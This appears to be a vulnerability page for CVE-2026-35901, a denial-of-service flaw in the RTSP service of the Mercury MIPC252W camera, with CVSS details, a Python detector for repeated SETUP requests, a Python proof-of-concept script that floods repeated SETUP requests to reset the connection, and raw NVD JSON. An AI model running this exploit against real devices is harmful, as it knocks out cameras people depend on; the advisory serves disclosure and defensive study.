Security Vulnerability Report
CVE-2026-35901 CVSS 4.4 MEDIUM

CVE-2026-35901

Published: 2026-04-27 19:16:48
Last Modified: 2026-05-05 13:41:20

Description

A handling issue in the RTSP service of the Mercury MIPC252W 1.0.5 Build 230306 Rel.79931n allows an authenticated attacker to trigger session termination by repeatedly sending SETUP requests for the same media track within a single RTSP session. This causes the server to reset the RTSP connection, leading to a denial-of-service condition.
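A defender-side check for the behaviour described above, as an added example that is not part of the original report or the vendor's code: it parses the client-to-server bytes of one RTSP connection and reports any track that received more than one SETUP within the same session. The sample stream, the `max_setups` threshold and the function names are assumptions made for illustration; interleaved RTP data on the same connection is not handled.

```python
import re
from collections import Counter

# Constructed client-to-server bytes of one RTSP connection (not a real capture).
SAMPLE = (
    b"SETUP rtsp://192.0.2.10:554/stream1/track1 RTSP/1.0\r\nCSeq: 2\r\n"
    b"Transport: RTP/AVP;unicast;client_port=5000-5001\r\n\r\n"
    b"SETUP rtsp://192.0.2.10:554/stream1/track2 RTSP/1.0\r\nCSeq: 3\r\n"
    b"Session: 1A2B3C\r\nTransport: RTP/AVP;unicast;client_port=5002-5003\r\n\r\n"
    b"SET_PARAMETER rtsp://192.0.2.10:554/stream1 RTSP/1.0\r\nCSeq: 4\r\n"
    b"Session: 1A2B3C\r\nContent-Length: 10\r\n\r\nSETUP: x\r\n"
    b"SETUP rtsp://192.0.2.10:554/stream1/track1 RTSP/1.0\r\nCSeq: 5\r\n"
    b"Session: 1A2B3C\r\nTransport: RTP/AVP;unicast;client_port=5000-5001\r\n\r\n"
    b"SETUP rtsp://192.0.2.10:554/stream1/track1/ RTSP/1.0\r\nCSeq: 6\r\n"
    b"Session: 1A2B3C\r\nTransport: RTP/AVP;unicast;client_port=5000-5001\r\n\r\n"
)

def parse_requests(stream):
    """Split a byte stream into (method, uri, headers) tuples, skipping bodies."""
    pos, out = 0, []
    while True:
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            return out  # an incomplete trailing request is ignored
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        match = re.match(r"([A-Z_]+) (\S+) RTSP/\d\.\d$", lines[0])
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = headers.get("content-length", "0")
        pos = end + 4 + (int(length) if length.isdigit() else 0)
        if match:
            out.append((match.group(1), match.group(2), headers))

def repeated_setups(stream, max_setups=1):
    """Return {(session_id, track_uri): count} for tracks SETUP too often."""
    counts = Counter()
    for method, uri, headers in parse_requests(stream):
        sid = headers.get("session", "").split(";")[0].strip()
        if sid:
            # The SETUP that opens a session has no Session header yet.
            for key in [k for k in counts if k[0] == ""]:
                counts[(sid, key[1])] += counts.pop(key)
        if method == "SETUP":
            counts[(sid, uri.rstrip("/"))] += 1
    return {key: n for key, n in counts.items() if n > max_setups}

if __name__ == "__main__":
    print(repeated_setups(SAMPLE))
```

RFC 2326 lets a client re-issue SETUP to change transport parameters, so a threshold above 1 may be needed where such clients exist.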

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:* - NOT VULNERABLE
Mercury MIPC252W 1.0.5 Build 230306 Rel.79931n

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

def exploit_rtsp_dos(target_ip, target_port, username, password):
    """
    PoC for CVE-2026-35901
    Trigger DoS by sending repeated SETUP requests.
    """
    # Connect to RTSP service
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))

    # Basic RTSP Sequence (Simplified)
    # 1. DESCRIBE (Not always strictly needed for the specific crash, but good for context)
    # 2. SETUP (Initial)
    # 3. SETUP (Repeated - Trigger)

    url = f"rtsp://{target_ip}:{target_port}/live"
    session_id = "123456"  # Placeholder, usually extracted from server response

    # Sending repeated SETUP requests to the same track
    for i in range(10):
        payload = f"SETUP {url}/trackID=1 RTSP/1.0\r\n"
        payload += f"CSeq: {i}\r\n"
        payload += f"Session: {session_id}\r\n"
        payload += "Transport: RTP/AVP;unicast;client_port=5000-5001\r\n\r\n"

        try:
            s.send(payload.encode())
            print(f"Sent SETUP request {i}")
        except Exception as e:
            print(f"Connection reset by peer: {e}")
            break

    s.close()

if __name__ == "__main__":
    # Replace with actual target details
    exploit_rtsp_dos("192.168.1.100", 554, "admin", "admin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35901", "sourceIdentifier": "[email protected]", "published": "2026-04-27T19:16:47.583", "lastModified": "2026-05-05T13:41:20.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A handling issue in the RTSP service of the Mercury MIPC252W 1.0.5 Build 230306 Rel.79931n allows an authenticated attacker to trigger session termination by repeatedly sending SETUP requests for the same media track within a single RTSP session. This causes the server to reset the RTSP connection, leading to a denial-of-service condition."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:*", "matchCriteriaId": "61FE2E9E-C0F5-4F45-B4F4-10E05CEB0395"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:*", "matchCriteriaId": "5CBF3BC0-1845-4D38-BFD2-3B02219C1BD8"}]}]}], "references": [{"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_2th/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_2th/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}